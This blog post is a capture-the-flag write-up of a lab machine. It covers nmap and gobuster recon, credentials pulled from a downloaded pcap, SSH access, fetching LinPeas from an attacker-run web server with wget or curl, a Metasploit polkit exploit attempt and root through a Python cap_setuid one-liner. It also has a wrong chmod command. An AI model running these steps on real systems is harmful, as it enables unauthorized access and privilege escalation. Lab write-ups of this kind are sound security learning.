I’m back! Life came at me all at once, with a new job, trip around Asia, Christmas break and then coming back to settling in on things.
This post has been sitting in my drafts for approximately 1.5 months now, and I have more to come so stay tuned!
This was a fairly straightforward box, allowing use to gain root flag via a vulnerability found with Linpeas.
Recon
As always, we start out with some simple recon with nmap:
nmap 10.10.10.245 -sV --script=bannerI use the banner-grabbing script in case there is any additional information behind the banners on ports searched, of which we find two:
21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicornPort 80 likely indicates there is a webpage available. We’ll keep that in mind for now and move on to running a gobuster scan:
gobuster dir -u http://10.10.10.245 -w /usr/share/seclists/Discovery/Web-Content/common.txtWe immediately have some more information to work with from this scan:
When navigating to the /data directory, we’re promoted to download a .pcap file for use in Wireshark. The most important thing to note here is that this takes us to /data/1, so what happens if we navigate to /data/0?
This downloads a .pcap file with a lot more information than we would have received from the website during that time.
Foothold
Inside this .pcap file we are provided with two new IPs:
192.168.196.1
192.168.196.16However, running nmap on both of these provides us with a bad gateway. No luck!
Further reading through the .pcap file, we stumbled across something interesting: what appears to be some credentials, specifically a username and password for a user named nathan.
From here, I spent some time attempting to find a login page on the webpage to no avail. After some frustration, I remembered that SSH port 22 was open on this IP!
Connecting to the box IP with the user credentials we found was a success, and we’re able to gain the user flag.
Priv Esc
Now that we have a foothold on the machine, it’s time to look at escalating the session to root.
Creating a simple FTP client on our attacking machine in a separate terminal window, we can copy LinPeas over. I’ll do a separate post in future on LinPeas, but essentially this is a vulnerability scanning script to look for potential privilege escalation opportunities on Linux machines, and is also available for Windows.
For now though, we’ll keep it simple and use LinPeas, which can be downloaded here:
You can transfer the files easily from your attacker machine to the remote system with the following method:
On the attacker machine:
- Navigate to cd /tmp
- Download the file you want to move
- Run python3 -m http.server 12345
On the remote system
- wget http://IP:12345/FILE, where IP is your tun0 IP and FILE is the file name.
- If wget is not available, you can also use curl curl http://IP:12345/FILE -o FILENAME, where -o flag is the name the file will be called on the remote system
With LinPeas now copied, we can allow it to be executed with chmod -x pinpeas.sh and run it.
We immediately identify that this system is vulnerable to CVE-2021-3560. To exploit this, it’s easiest to use Metasploit.
- Open Metasploit and use the module ssh_login
- Set the fields for the user credentials we gathered earlier
Once the Metasploit SSH session is connected, search and run the exploit
/linux/local/polkit_dbus_auth_bypassAnd… it failed? Let’s move on to Plan B.
Plan B – Binary Exploitation
Checking our LinPeas output, we can find that there is another high exploit chance vulnerability detected in /usr/bin/python3.8 = cap _setuid,cap_net_bind_service+eip
Checking GTFOBins, specifically for Python bins, we able to find cap_setuid specifically mentioned. By running this script with a slight modification to the python directory, we can elevate to root:
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'And success! If we enter whoami, we find out we are root. We can navigate into /root/, where we can find the flag!
Room Complete!
This was a fairly simple and straightforward room, using prior knowledge from my time on TryHackMe, as well as knowledge I’ve gained from Hack The Box (more write ups coming soon!)
